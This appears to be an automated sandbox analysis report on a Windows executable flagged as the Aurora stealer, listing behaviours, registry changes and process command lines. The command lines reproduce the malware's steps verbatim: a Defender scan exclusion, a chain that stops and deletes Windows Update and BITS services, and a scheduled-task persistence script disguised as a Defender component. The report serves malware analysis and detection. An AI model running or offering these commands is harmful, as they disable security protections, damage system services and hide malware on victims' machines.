Analysis Overview
SHA256: 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e
Threat Level: Known bad
The file 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe was found to be: Known bad.
Malicious Activity Summary
Aurora
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies security service
Downloads MZ/PE file
Stops running service(s)
Blocklisted process makes network request
Drops file in Drivers directory
Executes dropped EXE
Uses the VBS compiler for execution
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported: 2023-02-21 06:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2023-02-21 06:02
Reported: 2023-02-21 06:08
Platform: win10v2004-20230220-en
Max time kernel: 55s
Max time network: 72s
Command Line
Signatures
Aurora
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1892 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1772 set thread context of 4328 | N/A | C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1756 set thread context of 2476 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 1892 set thread context of 2736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
"C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1772 -ip 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 240
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command not preserved in this copy of the report]"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
